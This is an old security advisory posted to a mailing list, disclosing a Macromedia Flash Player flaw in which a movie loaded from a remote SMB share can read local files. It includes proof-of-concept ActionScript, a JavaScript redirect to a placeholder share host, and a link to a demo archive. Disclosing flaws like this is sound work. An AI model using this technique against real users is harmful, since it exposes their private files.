Flash player can read local files

[jelmer <jkuperus () xs1 xs4all nl>]

The following message apperently bounced the first time i send it :s

Flash player can read local files

Description

There is a flaw in the macromedia flash player wich allows reading and
sending of local files
The flaw lies in the fact that when a flash movie is loaded from a remote
smb share it is treated
as though it was loaded from the users harddisk.
Allowing the following action script code to work

urlXML = new XML();
urlXML.onLoad = readXML;
myField = "Loading data...";
urlXML.load("file:///C:/jelmer.txt");

function readXML() {
 myField = urlXML.toString();
}

It uses the flash's xml control to read and display the contents of
c:\jelmer.txt
In order for it to work one has to get a user to view a specially crafted
webpage wich could look like this

<script language="javascript">
 document.location.href='\\\\HOST_IP\\exploit\\read.swf';
</script>

It points the browser to the swf on the smb share so that it displays it

Demonstration

Download the following file and extract the contained swf to a remote
share,
start it from there (  for instance by dragging it from the share into
explorer or creating a html file as described above)

http://www.xs4all.nl/~jkuperus/exploit.zip

It will read and display the contents of c:\jelmer.txt

A live demonstration is not provided because it really isn't good practice
to open up smb shares to the
outside world and i am only able to host this sort of stuff at my home
server

vendor status

Macromedia was notified a long time ago  as far as I know they are still
looking in to it.